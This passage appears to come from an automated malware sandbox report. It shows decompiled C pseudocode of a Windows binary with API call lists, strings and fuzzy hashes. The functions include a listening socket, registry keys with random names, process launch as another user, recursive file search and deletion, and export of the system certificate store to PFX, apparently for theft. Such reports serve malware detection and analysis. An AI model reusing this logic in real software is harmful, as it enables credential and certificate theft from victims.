								}
							}
						}
						goto L24;
						L9:
						_t34 = _v148 - 1;
						_v148 = _t34;
					} while (_t34 > 0);
					_t69 = _t69 | 0xffffffff;
					goto L11;
				} else {
					L20:
					E00406CC0(_t68, _v28);
					return _t68;
				}
				L24:
			}

0x00406d48
0x00406d51
0x00406d56
0x00406d78
0x00406d7d
0x00406d83
0x00406d8e
0x00406d93
0x00406da0
0x00406da0
0x00406dac
0x00406dae
0x00406db3
0x00406db3
0x00406db8
0x00406dd0
0x00406dd4
0x00406de1
0x00406de6
0x00000000
0x00406de8
0x00406e01
0x00406e05
0x00406e17
0x00406e18
0x00000000
0x00406e07
0x00406e0d
0x00406e15
0x00000000
0x00000000
0x00406e15
0x00406e05
0x00406e32
0x00406e32
0x00406e38
0x00406e82
0x00406e82
0x00406e89
0x00406e9c
0x00406e3a
0x00406e42
0x00406e48
0x00406e4d
0x00406e6a
0x00406e6a
0x00406e70
0x00406e75
0x00406e7c
0x00406e7c
0x00000000
0x00406e4f
0x00406e56
0x00406e5e
0x00406e9f
0x00406ead
0x00406eb5
0x00406ebd
0x00406eee
0x00406ef4
0x00406ef9
0x00406f00
0x00406f00
0x00406f0a
0x00406f1c
0x00406ebf
0x00406ec4
0x00406ec8
0x00000000
0x00406ec8
0x00406e60
0x00406e64
0x00000000
0x00406e64
0x00406e5e
0x00406e4d
0x00000000
0x00406e1e
0x00406e22
0x00406e23
0x00406e27
0x00406e2f
0x00000000
0x00406ecb
0x00406ecb
0x00406ed9
0x00406eeb
0x00406eeb
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406DA0
socket.WS2_32(?,00000001,00000006), ref: 00406DDF
bind.WS2_32(00000000,00000002,-0000001D), ref: 00406E01
listen.WS2_32(00000000,7FFFFFFF), ref: 00406E0D
closesocket.WS2_32(00000000), ref: 00406E18
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00406E42
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 00406E56
CloseHandle.KERNEL32(?,?,00000000,00000008), ref: 00406E64
shutdown.WS2_32(00000000,00000002), ref: 00406E75
closesocket.WS2_32(00000000), ref: 00406E7C

Part of subcall function 00406CC0: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00406EDE), ref: 00406CE1
Part of subcall function 00406CC0: WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00406CF4

Strings

p0u, xrefs: 00406E18, 00406E7C, 00406F00

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CreateSelectclosesocket$CloseCountHandleTickbindlistenshutdownsocket
String ID: p0u
API String ID: 2712627274-1742372003
Opcode ID: a649ecc298422131f00562a53d64640d4274286561326de312c0385d1576d7da
Instruction ID: 2a6aec74382d51fed9e26fb3b63c60e84e2ac8c414d2a019a1c466be1411b144
Opcode Fuzzy Hash: a649ecc298422131f00562a53d64640d4274286561326de312c0385d1576d7da
Instruction Fuzzy Hash: 4941D435204201ABD310AF24DD45BAB77A4FBC4760F01863AF956FB2E0E778D9198769

Uniqueness

Uniqueness Score: -1.00%

Function 00416AB0, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 180
registryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00416AB0() {
				long _t57;
				long _t59;
				long _t63;
				long _t70;
				long _t77;
				long _t82;
				unsigned int* _t84;
				unsigned int* _t85;
				short _t88;
				signed int _t89;
				void* _t100;
				intOrPtr _t112;
				intOrPtr _t113;
				signed int _t115;
				intOrPtr _t117;
				short* _t120;
				void* _t122;
				signed int _t131;
				void* _t133;

				_t88 = 0;
				 *((char*)(_t133 + 0x2b)) = 0;
				_t57 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0, _t133 + 0x18, 0);
				if(_t57 == 0) {
					 *(_t133 + 0x1c) = _t57;
					do {
						_t59 = GetTickCount();
						if(_t59 !=  *0x42dd08) {
							 *0x42dd08 = _t59;
							E00412320(_t59);
						}
						_t10 = _t60 - (0xaaaaaaab * E00412360() >> 0x20 >> 1) + (0xaaaaaaab * E00412360() >> 0x20 >> 1) * 2 + 4; // 0x4
						_t115 = _t10;
						 *(_t133 + 0x18) = _t115;
						_t63 = GetTickCount();
						if(_t63 !=  *0x42dd08) {
							 *0x42dd08 = _t63;
							E00412320(_t63);
						}
						if((E00412360() & 0x00000100) == 0) {
							 *((intOrPtr*)(_t133 + 0x2c)) = "aeiouy";
							 *((intOrPtr*)(_t133 + 0x30)) = "bcdfghklmnpqrstvwxz";
						} else {
							 *((intOrPtr*)(_t133 + 0x2c)) = "bcdfghklmnpqrstvwxz";
							 *((intOrPtr*)(_t133 + 0x30)) = "aeiouy";
						}
						_t89 = 0;
						_t131 = 0;
						 *(_t133 + 0x14) = 0;
						if(_t115 != 0) {
							L12:
							while(1) {
								if(_t131 == 2) {
									_t82 = GetTickCount();
									if(_t82 !=  *0x42dd08) {
										 *0x42dd08 = _t82;
										 *0x42dd10 = _t82;
										_t19 = _t131 - 1; // -1
										_t113 = _t19;
										_t84 = 0x42dd10;
										do {
											_t84[1] = ( *_t84 >> 0x0000001e ^  *_t84) * 0x6c078965 + _t113;
											_t84 =  &(_t84[1]);
											_t113 = _t113 + 1;
										} while (_t84 < 0x42e6cc);
										 *0x42e6dc = _t113;
									}
									if((E00412360() & 0x00000100) == 0) {
										 *((intOrPtr*)(_t133 + 0x2c)) = "aeiouy";
										 *((intOrPtr*)(_t133 + 0x30)) = "bcdfghklmnpqrstvwxz";
									} else {
										 *((intOrPtr*)(_t133 + 0x2c)) = "bcdfghklmnpqrstvwxz";
										 *((intOrPtr*)(_t133 + 0x30)) = "aeiouy";
									}
									_t131 = 0;
								}
								_t117 =  *((intOrPtr*)(_t133 + 0x2c + _t131 * 4));
								asm("sbb eax, eax");
								_t30 = ( ~(_t117 - "bcdfghklmnpqrstvwxz") & 0xfffffff3) + 0x12; // 0x26
								_t122 = _t30;
								if(_t122 != 0) {
									_t77 = GetTickCount();
									if(_t77 !=  *0x42dd08) {
										 *0x42dd08 = _t77;
										 *0x42dd10 = _t77;
										_t112 = 1;
										_t85 = 0x42dd10;
										do {
											_t85[1] = ( *_t85 >> 0x0000001e ^  *_t85) * 0x6c078965 + _t112;
											_t85 =  &(_t85[1]);
											_t112 = _t112 + 1;
										} while (_t85 < 0x42e6cc);
										_t89 =  *(_t133 + 0x14);
										 *0x42e6dc = _t112;
									}
									_t100 = E00412360() - _t78 / (_t122 + 1) * (_t122 + 1);
								} else {
									_t100 = 0;
								}
								( *(_t133 + 0x38))[_t89] =  *((char*)(_t117 + _t100));
								_t89 = _t89 + 1;
								_t131 = _t131 + 1;
								 *(_t133 + 0x14) = _t89;
								if(_t89 <  *(_t133 + 0x18)) {
									continue;
								}
								_t115 =  *(_t133 + 0x18);
								goto L30;
							}
						}
						L30:
						_t120 =  *(_t133 + 0x38);
						_t120[_t115] = 0;
						 *_t120 = CharUpperW( *_t120 & 0x0000ffff);
						if(RegCreateKeyExW( *(_t133 + 0x3c), _t120, 0, 0, 0, 3, 0, _t133 + 0x28, _t133 + 0x28) != 0) {
							goto L32;
						} else {
							RegCloseKey( *(_t133 + 0x24));
							if( *(_t133 + 0x28) == 1) {
								_t88 = 1;
							} else {
								goto L32;
							}
						}
						L35:
						RegCloseKey( *(_t133 + 0x20));
						goto L36;
						L32:
						_t70 =  *(_t133 + 0x1c) + 1;
						 *(_t133 + 0x1c) = _t70;
					} while (_t70 < 0x64);
					_t88 =  *((intOrPtr*)(_t133 + 0x13));
					goto L35;
				}
				L36:
				return _t88;
			}

0x00416aca
0x00416ad1
0x00416ad5
0x00416add
0x00416ae6
0x00416af0
0x00416af6
0x00416afe
0x00416b00
0x00416b05
0x00416b05
0x00416b1f
0x00416b1f
0x00416b22
0x00416b26
0x00416b2e
0x00416b30
0x00416b35
0x00416b35
0x00416b44
0x00416b58
0x00416b60
0x00416b46
0x00416b46
0x00416b4e
0x00416b4e
0x00416b68
0x00416b6a
0x00416b6c
0x00416b72
0x00000000
0x00416b86
0x00416b89
0x00416b8b
0x00416b93
0x00416b95
0x00416b9a
0x00416b9f
0x00416b9f
0x00416ba2
0x00416ba7
0x00416bb8
0x00416bbb
0x00416bbe
0x00416bbf
0x00416bc6
0x00416bc6
0x00416bd6
0x00416bea
0x00416bf2
0x00416bd8
0x00416bd8
0x00416be0
0x00416be0
0x00416bfa
0x00416bfa
0x00416bfc
0x00416c09
0x00416c0e
0x00416c0e
0x00416c13
0x00416c19
0x00416c25
0x00416c27
0x00416c2c
0x00416c31
0x00416c36
0x00416c40
0x00416c51
0x00416c54
0x00416c57
0x00416c58
0x00416c5f
0x00416c63
0x00416c63
0x00416c78
0x00416c15
0x00416c15
0x00416c15
0x00416c83
0x00416c87
0x00416c88
0x00416c89
0x00416c91
0x00000000
0x00416b80
0x00416c97
0x00000000
0x00416c97
0x00416b86
0x00416c9b
0x00416c9b
0x00416ca1
0x00416cc3
0x00416cd4
0x00000000
0x00416cd6
0x00416cdb
0x00416ce6
0x00416d00
0x00000000
0x00000000
0x00000000
0x00416ce6
0x00416d02
0x00416d07
0x00000000
0x00416ce8
0x00416cec
0x00416ced
0x00416cf1
0x00416cfa
0x00000000
0x00416cfa
0x00416d10
0x00416d16

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00416AD5
GetTickCount.KERNEL32 ref: 00416AF6
GetTickCount.KERNEL32 ref: 00416B26
GetTickCount.KERNEL32 ref: 00416B8B
CharUpperW.USER32(00000000), ref: 00416CA9
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?), ref: 00416CCC
RegCloseKey.ADVAPI32(?), ref: 00416CDB

Strings

SOFTWARE\Microsoft, xrefs: 00416AC5
bcdfghklmnpqrstvwxz, xrefs: 00416B46, 00416B60, 00416BD8, 00416BF2, 00416C02
aeiouy, xrefs: 00416B4E, 00416B58, 00416BE0, 00416BEA

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$Create$CharCloseUpper
String ID: SOFTWARE\Microsoft$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 1427789485-1268794116
Opcode ID: b143b084f1e0a7b97b0cfd57dee0f8b273a38636cfda536ca1279f0451b01eea
Instruction ID: d8b77f8d14d1a311e8b9700437058f9950765cc0a594941bb8ca4bc3bbb6ea8b
Opcode Fuzzy Hash: b143b084f1e0a7b97b0cfd57dee0f8b273a38636cfda536ca1279f0451b01eea
Instruction Fuzzy Hash: 1261E4706443109FC314DF25D88579ABBE4EB88304F55853FE981EB2A0D778E986CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00412C70, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 99
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00412C70(void* _a4) {
				char _v8;
				WCHAR* _v16;
				struct _STARTUPINFOW _v88;
				WCHAR* _v101;
				struct _PROCESS_INFORMATION _v104;
				intOrPtr _v108;
				signed int _v112;
				char _v113;
				_Unknown_base(*)()* _t26;
				void* _t38;
				WCHAR* _t45;
				struct HINSTANCE__* _t49;
				intOrPtr* _t50;
				void* _t53;

				_v101 = 0;
				_t49 = LoadLibraryA("userenv.dll");
				if(_t49 == 0) {
					return 0;
				} else {
					_t50 = GetProcAddress(_t49, "CreateEnvironmentBlock");
					_t26 = GetProcAddress(_t49, "DestroyEnvironmentBlock");
					_v104.dwProcessId = _t26;
					if(_t50 != 0 && _t26 != 0) {
						_t53 = _a4;
						_push(0);
						_push(_t53);
						_push( &(_v104.hThread));
						_v104.hThread = 0;
						if( *_t50() == 0) {
							_v112 = 0;
						}
						_v8 = 0;
						E00410870(_t30,  &_v88, 0, 0x44);
						_t45 = _v16;
						_v104.hThread = 0x44;
						_v104.dwThreadId = 0;
						if(_t45 == 0) {
							_t45 =  &_v8;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_t53, 0, _t45, 0, 0, 0,  ~_v112 & 0x00000400 | 0x04000000, _v112, 0,  &_v88,  &_v104) != 0) {
							CloseHandle(_v104.hThread);
							CloseHandle(_v104);
							_v113 = _v104.dwProcessId != 0;
						}
						_t38 = _v112;
						if(_t38 != 0) {
							_v108(_t38);
						}
					}
					FreeLibrary(_t49);
					return _v101 & 0x000000ff;
				}
			}

0x00412c7e
0x00412c88
0x00412c8c
0x00412d88
0x00412c92
0x00412ca6
0x00412ca8
0x00412caa
0x00412cb0
0x00412cbe
0x00412cc5
0x00412cc6
0x00412ccb
0x00412ccc
0x00412cd4
0x00412cd6
0x00412cd6
0x00412ce4
0x00412cec
0x00412cf1
0x00412cf8
0x00412d00
0x00412d06
0x00412d08
0x00412d08
0x00412d21
0x00412d3c
0x00412d49
0x00412d50
0x00412d56
0x00412d56
0x00412d5b
0x00412d61
0x00412d64
0x00412d64
0x00412d61
0x00412d69
0x00412d7b
0x00412d7b

APIs

LoadLibraryA.KERNEL32(userenv.dll,?,?,?,00000000), ref: 00412C82
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00412C9E
GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00412CA8
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00412D34
CloseHandle.KERNEL32(?), ref: 00412D49
CloseHandle.KERNEL32(?), ref: 00412D50
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00412D69

Strings

D, xrefs: 00412CF8
CreateEnvironmentBlock, xrefs: 00412C98
userenv.dll, xrefs: 00412C79
DestroyEnvironmentBlock, xrefs: 00412CA0

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$D$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-87856036
Opcode ID: c5c258d8c0f9c0e66dc18484a32c16c5802c345c7fb51a66f2361cafa8584564
Instruction ID: fb4dc9fc9105082488463cdaf7cb7d5b968f38b40d4c37c8c112d1a28e73aba2
Opcode Fuzzy Hash: c5c258d8c0f9c0e66dc18484a32c16c5802c345c7fb51a66f2361cafa8584564
Instruction Fuzzy Hash: A63192B2504345AFD720DF64DD81EABBBECFB84748F04482EFA85E2150D678DD488B66

Uniqueness

Uniqueness Score: -1.00%

Function 00418700, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00418700(long __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				short _v532;
				char _v540;
				short _v1076;
				intOrPtr _v1078;
				struct _WIN32_FIND_DATAW _v1124;
				intOrPtr _v1128;
				WCHAR* _v1132;
				void* _v1136;
				signed int _t47;
				int _t49;
				signed int _t51;
				intOrPtr _t53;
				signed int _t56;
				long _t65;
				void* _t68;
				WCHAR* _t70;
				WCHAR* _t73;
				WCHAR* _t80;
				intOrPtr _t90;
				signed int _t93;
				long _t94;

				_v1124.ftCreationTime = __edx;
				_t80 = __ecx;
				_v1124.dwFileAttributes = __ecx;
				_t70 = "*";
				L1:
				_t47 =  *_t70 & 0x0000ffff;
				if(_t47 == 0x5c || _t47 == 0x2f) {
					_t70 =  &(_t70[1]);
					goto L1;
				}
				_t49 = PathCombineW( &_v524, _t80, _t70);
				if(_t49 == 0) {
					L37:
					return _t49;
				}
				_t49 = FindFirstFileW( &_v532,  &_v1124);
				_v1136 = _t49;
				if(_t49 == 0xffffffff) {
					goto L37;
				}
				_t68 = _a20;
				_t90 = _a4;
				while(_t68 == 0 || WaitForSingleObject(_t68, 0) == 0x102) {
					if(_v1124.cFileName != 0x2e) {
						L13:
						_t51 = _v1124.dwFileAttributes & 0x00000010;
						if(_t51 == 0 || (_a8 & 0x00000002) == 0) {
							if(_t51 != 0 || (_a8 & 0x00000004) == 0) {
								goto L25;
							} else {
								goto L17;
							}
						} else {
							L17:
							_t93 = 0;
							if(_t90 == 0) {
								L25:
								if((_v1124.dwFileAttributes & 0x00000010) == 0 || (_a8 & 0x00000001) == 0) {
									L35:
									if(FindNextFileW(_v1136,  &_v1124) != 0) {
										continue;
									}
									break;
								} else {
									_t73 =  &(_v1124.cFileName);
									while(1) {
										_t56 =  *_t73 & 0x0000ffff;
										if(_t56 != 0x5c && _t56 != 0x2f) {
											break;
										}
										_t73 =  &(_t73[1]);
									}
									if(PathCombineW( &_v532, _v1132, _t73) != 0) {
										_t94 = _a24;
										if(_t94 != 0) {
											Sleep(_t94);
										}
										E00418700( &_v540, _v1136, _t90, _a8, _a12, _a16, _t68, _t94, _a28);
									}
									goto L35;
								}
							}
							while(PathMatchSpecW( &(_v1124.cFileName),  *(_v1128 + _t93 * 4)) == 0) {
								_t93 = _t93 + 1;
								if(_t93 < _t90) {
									continue;
								}
								goto L25;
							}
							_push(_a16);
							if(_a12() == 0) {
								break;
							}
							_t65 = _a28;
							if(_t65 != 0) {
								Sleep(_t65);
							}
							goto L25;
						}
					}
					_t53 = _v1078;
					if(_t53 == 0 || _t53 == 0x2e && _v1076 == 0) {
						goto L35;
					} else {
						goto L13;
					}
				}
				_t49 = FindClose(_v1136);
				goto L37;
			}

0x0041870d
0x00418711
0x00418715
0x00418719
0x00418720
0x00418720
0x00418726
0x0041872d
0x00000000
0x0041872d
0x0041873c
0x00418744
0x004188a2
0x004188a8
0x004188a8
0x00418757
0x0041875d
0x00418764
0x00000000
0x00000000
0x0041876a
0x0041876d
0x00418770
0x0041878e
0x004187b0
0x004187b4
0x004187b7
0x004187c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004187c9
0x004187c9
0x004187c9
0x004187cd
0x00418813
0x00418818
0x0041887f
0x00418891
0x00000000
0x00000000
0x00000000
0x00418820
0x00418820
0x00418824
0x00418824
0x0041882a
0x00000000
0x00000000
0x00418831
0x00418831
0x0041884c
0x0041884e
0x00418853
0x00418856
0x00418856
0x0041887a
0x0041887a
0x00000000
0x0041884c
0x00418818
0x004187d0
0x004187e7
0x004187ea
0x00000000
0x00000000
0x00000000
0x004187ec
0x004187f5
0x004187ff
0x00000000
0x00000000
0x00418805
0x0041880a
0x0041880d
0x0041880d
0x00000000
0x0041880a
0x004187b7
0x00418790
0x00418798
0x00000000
0x00000000
0x00000000
0x00000000
0x00418798
0x0041889c
0x00000000

APIs

PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
PathMatchSpecW.SHLWAPI(?), ref: 004187DD
Sleep.KERNEL32(?), ref: 0041880D
PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844
Sleep.KERNEL32(?), ref: 00418856
FindNextFileW.KERNEL32(?,00000010), ref: 00418889
FindClose.KERNEL32(?), ref: 0041889C

Strings

., xrefs: 00418788

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FindPath$CombineFileSleep$CloseFirstMatchNextObjectSingleSpecWait
String ID: .
API String ID: 321357284-248832578
Opcode ID: e69983c9b567c13dbbacf9fcb2d1e53c06043e17816e2414b63cd5e5766e8278
Instruction ID: 7b6f186980f1e2c499ce24f9a4322bf73428a36a86d6d1bf358c26fe468fdb2a
Opcode Fuzzy Hash: e69983c9b567c13dbbacf9fcb2d1e53c06043e17816e2414b63cd5e5766e8278
Instruction Fuzzy Hash: 8641D0755043019BC720EF65CC88AEB77E9AF94740F14891EF965932A0DB38D884CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185D0(WCHAR* __ecx) {
				short _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				struct _WIN32_FIND_DATAW _v612;
				short _v1116;
				short _v1124;
				void* _v1128;
				short _v1132;
				void* _v1136;
				signed int _t20;
				void* _t26;
				signed int _t27;
				intOrPtr _t32;
				WCHAR* _t41;
				WCHAR* _t43;
				WCHAR* _t50;

				_t50 = __ecx;
				_t41 = "*";
				L1:
				_t20 =  *_t41 & 0x0000ffff;
				if(_t20 == 0x5c || _t20 == 0x2f) {
					_t41 =  &(_t41[1]);
					goto L1;
				}
				if(PathCombineW( &_v1116, _t50, _t41) == 0) {
					L21:
					SetFileAttributesW(_t50, 0x80);
					return RemoveDirectoryW(_t50) & 0xffffff00 | _t24 != 0x00000000;
				}
				_t26 = FindFirstFileW( &_v1124,  &_v604);
				_v1128 = _t26;
				if(_t26 == 0xffffffff) {
					goto L21;
				}
				do {
					if(_v604.cFileName != 0x2e) {
						L11:
						_t43 =  &(_v604.cFileName);
						while(1) {
							_t27 =  *_t43 & 0x0000ffff;
							if(_t27 != 0x5c && _t27 != 0x2f) {
								break;
							}
							_t43 =  &(_t43[1]);
						}
						if(PathCombineW( &_v1124, _t50, _t43) != 0) {
							if((_v612.dwFileAttributes & 0x00000010) == 0) {
								SetFileAttributesW( &_v1132, 0x80);
								DeleteFileW( &_v1132);
							} else {
								E004185D0( &_v1132);
							}
						}
						goto L19;
					}
					_t32 = _v558;
					if(_t32 != 0 && (_t32 != 0x2e || _v556 != 0)) {
						goto L11;
					}
					L19:
				} while (FindNextFileW(_v1136,  &_v612) != 0);
				FindClose(_v1136);
				goto L21;
			}

0x004185e0
0x004185e2
0x004185e7
0x004185e7
0x004185ed
0x004185f4
0x00000000
0x004185f4
0x00418610
0x004186d9
0x004186df
0x004186f4
0x004186f4
0x00418623
0x00418629
0x00418630
0x00000000
0x00000000
0x0041863c
0x00418645
0x00418665
0x00418665
0x00418670
0x00418670
0x00418676
0x00000000
0x00000000
0x0041867d
0x0041867d
0x0041868d
0x0041869b
0x004186aa
0x004186b1
0x0041869d
0x0041869d
0x0041869d
0x0041869b
0x00000000
0x0041868d
0x00418647
0x00418652
0x00000000
0x00000000
0x004186b3
0x004186c6
0x004186d3
0x00000000

APIs

PathCombineW.SHLWAPI(?,?,0040365E,750D46D0,00000000,?,74B05970), ref: 00418606
FindFirstFileW.KERNEL32(?,?,?,74B05970), ref: 00418623
PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418689
SetFileAttributesW.KERNEL32(?,00000080), ref: 004186AA
DeleteFileW.KERNEL32(?), ref: 004186B1
FindNextFileW.KERNEL32(?,?), ref: 004186C0
FindClose.KERNEL32(?), ref: 004186D3
SetFileAttributesW.KERNEL32(?,00000080,?,74B05970), ref: 004186DF
RemoveDirectoryW.KERNEL32(?,?,74B05970), ref: 004186E2

Strings

., xrefs: 0041863C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$AttributesCombinePath$CloseDeleteDirectoryFirstNextRemove
String ID: .
API String ID: 3031162630-248832578
Opcode ID: aaa06a57acc39cd14c7c885e6fb8443e738bfcaa9f33beb512a07759965565c1
Instruction ID: 04ee3962303c7269665011fb169b55e44c90ee7b1e2b5f4a88308d9256de6021
Opcode Fuzzy Hash: aaa06a57acc39cd14c7c885e6fb8443e738bfcaa9f33beb512a07759965565c1
Instruction Fuzzy Hash: 8E31D1712042056BC3349B64DD88AFB73E8EB89704F044A1FF98596290EF38D885876F

Uniqueness

Uniqueness Score: -1.00%

Function 004232A0, Relevance: 16.6, APIs: 11, Instructions: 148
encryptionmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E004232A0(void* __eax) {
				char _v600;
				char _v728;
				char _v792;
				char _v881;
				intOrPtr _v889;
				char _v896;
				char _v897;
				long _v900;
				long _v904;
				intOrPtr _v905;
				char _v908;
				char _v916;
				void* _v920;
				struct _SYSTEMTIME _v936;
				void* _v940;
				intOrPtr _v944;
				char _v945;
				void* __esi;
				void* _t33;
				void* _t38;
				void* _t41;
				signed int _t44;
				WCHAR* _t66;
				void* _t72;
				void* _t73;
				void* _t76;
				short _t78;
				char* _t80;
				intOrPtr* _t81;
				void* _t84;
				intOrPtr* _t86;
				signed int _t88;
				void* _t90;

				_t90 = (_t88 & 0xfffffff8) - 0x374;
				_v881 = 0;
				__imp__CertOpenSystemStoreW(0, 0x403968, _t72, _t76, _t84);
				_t73 = __eax;
				if(__eax == 0) {
					L19:
					return _v889;
				} else {
					_t86 = __imp__CertEnumCertificatesInStore;
					_t78 = 0;
					_t33 =  *_t86(__eax, 0);
					if(_t33 == 0) {
						L5:
						_v897 = 1;
						__imp__CertCloseStore(_t73, 0);
						return _v905;
					} else {
						do {
							_t78 = _t78 + 1;
							_t33 =  *_t86(__eax, _t33);
						} while (_t33 != 0);
						if(_t78 != 0) {
							_t80 =  &_v896;
							_v900 = 0;
							_v904 = 0;
							E00424100(0xa9, _t80);
							_push(4);
							_push(0);
							_t81 = __imp__PFXExportCertStoreEx;
							_push(_t80);
							_push( &_v904);
							_push(_t73);
							if( *_t81() != 0) {
								_t38 = _v936.wSecond;
								if(_t38 != 0) {
									_t38 = HeapAlloc( *0x42e6d4, 8, _t38 + 4);
								}
								_v920 = _t38;
								if(_t38 != 0) {
									_push(4);
									_push(0);
									_push( &_v916);
									_push( &(_v936.wSecond));
									_push(_t73);
									if( *_t81() != 0) {
										_t44 = 0;
										do {
											_t44 = _t44 + 1;
										} while ( *((short*)(0x403968 + _t44 * 2)) != 0);
										_t66 =  &_v908;
										 *((short*)(_t90 + E00410820(_t66, 0x403968, _t44 + _t44) + 0x3c)) = 0;
										CharLowerW(_t66);
										GetSystemTime( &_v936);
										_t82 =  &_v792;
										E00424100(0xaa,  &_v792);
										E00423230( &_v600);
										_push(_v936.wYear & 0x0000ffff);
										_push(_v936.wMonth & 0x0000ffff);
										_push(_v936.wDay & 0x0000ffff);
										_push( &_v920);
										_push( &_v600);
										_t83 =  &_v728;
										if(E00411D10(_t82, 0x3e,  &_v728, _t82) > 0 && E0040D620(_v944, _t83, 2, 0x403968, _t83, _v940) != 0) {
											_v945 = 1;
										}
									}
									_t41 = _v940;
									if(_t41 != 0) {
										HeapFree( *0x42e6d4, 0, _t41);
									}
								}
							}
							__imp__CertCloseStore(_t73, 0);
							goto L19;
						} else {
							goto L5;
						}
					}
				}
			}

0x004232a6
0x004232b6
0x004232bb
0x004232c1
0x004232c5
0x00423452
0x0042345c
0x004232cb
0x004232cb
0x004232d1
0x004232d5
0x004232d9
0x004232ed
0x004232f0
0x004232f5
0x00423305
0x004232db
0x004232e0
0x004232e2
0x004232e3
0x004232e5
0x004232eb
0x00423306
0x0042330f
0x00423317
0x0042331f
0x00423324
0x00423326
0x0042332a
0x00423330
0x00423335
0x00423336
0x0042333b
0x00423341
0x00423347
0x00423356
0x00423356
0x0042335c
0x00423362
0x00423368
0x0042336a
0x00423370
0x00423375
0x00423376
0x0042337b
0x00423381
0x00423383
0x00423383
0x00423384
0x00423397
0x004233a4
0x004233a9
0x004233b4
0x004233ba
0x004233c6
0x004233d2
0x004233e6
0x004233e7
0x004233e8
0x004233ed
0x004233f5
0x004233fe
0x0042340f
0x0042342d
0x0042342d
0x0042340f
0x00423432
0x00423438
0x00423443
0x00423443
0x00423438
0x00423362
0x0042344c
0x00000000
0x00000000
0x00000000
0x00000000
0x004232eb
0x004232d9

APIs

CertOpenSystemStoreW.CRYPT32 ref: 004232BB
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004232D5
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004232E3
CertCloseStore.CRYPT32(00000000,00000000), ref: 004232F5
PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 00423337
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 00423356
PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 00423377
CharLowerW.USER32(?,?,00403968,00000001), ref: 004233A9
GetSystemTime.KERNEL32(?,?,?,00403968,00000001), ref: 004233B4
HeapFree.KERNEL32(?,00000000,00000000), ref: 00423443
CertCloseStore.CRYPT32(00000000,00000000), ref: 0042344C

Memory Dump Source

